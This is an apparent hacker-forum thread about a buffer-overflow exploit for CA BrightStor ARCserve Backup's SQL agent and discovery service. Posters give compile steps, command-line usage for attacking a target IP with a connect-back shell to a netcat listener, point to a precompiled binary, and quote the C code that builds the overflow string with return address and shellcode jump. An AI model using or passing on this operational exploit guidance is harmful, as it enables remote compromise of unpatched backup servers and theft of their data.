* exploit by : cybertronic

* cybertronic[at]gmx[dot]net
*
* This exploits the following vulnerabilities:
*
* Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
* Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe
*
* I included a vulnerability scanner, that scans for the bugs mentioned above
* and logs to "scan.log" in working directory.
* You have to adjust the timeout, it works fine on my network with
* usec = 10000: ~10 hosts / sec
*
* some greetz fly to:
* HD Moore - I`ll pay you some drinks, you know what they are for;)
* houseofdabus

Why don't u try:

gcc caexploiter.c -o caexploiter

This will get you an exe. Don't forget to add the cygwin1.dll

Hey EzMe from clown wink.gif

Well some words about this exploit. As usually cybertronic has coded an exploit only working for the machine he has coded on. So it will only work for a specific OS version (language+patch). IT'S NOT UNIVERSAL ! So it wont work elsewhere. U will only crash the service by using this exploit. Personnaly I dont know how to exploit stack and heap in an unversal way. Someone knows ? What is needed ?

This is UNIVERSAL, cuz he used a ret addr of a dll used by CA BackupS.

The usage of UNIVERSAL here is kind of a misnomer. While he uses a DLL return address, which is one of the most reliable ways of reproducing an overflow accross all different versions of the OS, it's still not truely universal. Mounting location, DLL version, and other circumstances can cause this exploit to not work.

sorry but corect me if im wrong

Usage: CAexploiter -t <tip> -l <cbip> -p <cbport>
<tip> = target ip?????? cb= connect back ip <cbport>= connect back port

if you are choseing range later why do you need tip?

Ecko
hm anyone got success with this exploit? i always get "closed" while scanning. And i saw that this exploit got released in february already...

@toe

yes u right.

CAexploiter -t <ip you try to attack if you have scanned already one>
-l <your ip for connect back>
-p <your port which netcat listening on.>

then you will see

* --[ choose
* |
* |--[0] = start scanner
* --[1] = send some greetings to ca

if you choose 1, he will attack the ip you added in -t. same with cb and cp.

@o0oKARo0o

look in the theard on page 1. their is a compiled version.
Killaloop
the patch and vulnerability was published
on Aug 02 2005 according to securityfocus.
I was already wondering how one would write an exploit that short after the patch, but looks like this exploit has been private for some time.
could be that the hole is pretty used up already.
everyone that runs the sql version of this program should take some closer look if everything is alright on their systems!
exploit does not effect the oracle version, would need some changes.
tested it before I installed the update
brOmstar
I think he only added the new vuln(PORT 6070 ) to his scanner/exploiter the other vuln was discovered in february

* CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe <--- new one
* CA BrightStor ARCserve Backup Discovery Service - dsconfig.exe <--- old one

http://www.frsirt.com/bulletins/1698 <--- new one
http://www.frsirt.com/english/advisories/2005/0135 <--- old one advisory

he also released an exploit only for the new vuln ...here it is

I know that the one is old, the other is 2 days old.
no way to make this exploit in 2 days, thats all I said smile.gif
also its a pretty easy one and he also might have known the protocol already because of his research for the old vulnerability
who knows smile.gif

here is a good version that compiles fine for windows, also fixed some C syntax errors

You are right it's fast but really straight forward only a simple long string so it's not really necessary to know the protocol smile.gif

CODE

memset ( buffer, 0x41, sizeof ( buffer ) - 1 );             <--- fill the string
memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );    <--- sub esp
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );   <--- jmp/call esp
memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );        <--- jmp 2 shellcode

Killaloop
yep no protocol, found the same when cleaning the source
just one long string to overflow the buffer is needed nothing hard anywhere.
so yes it can be done in 2 days easily and I was wrong smile.gif
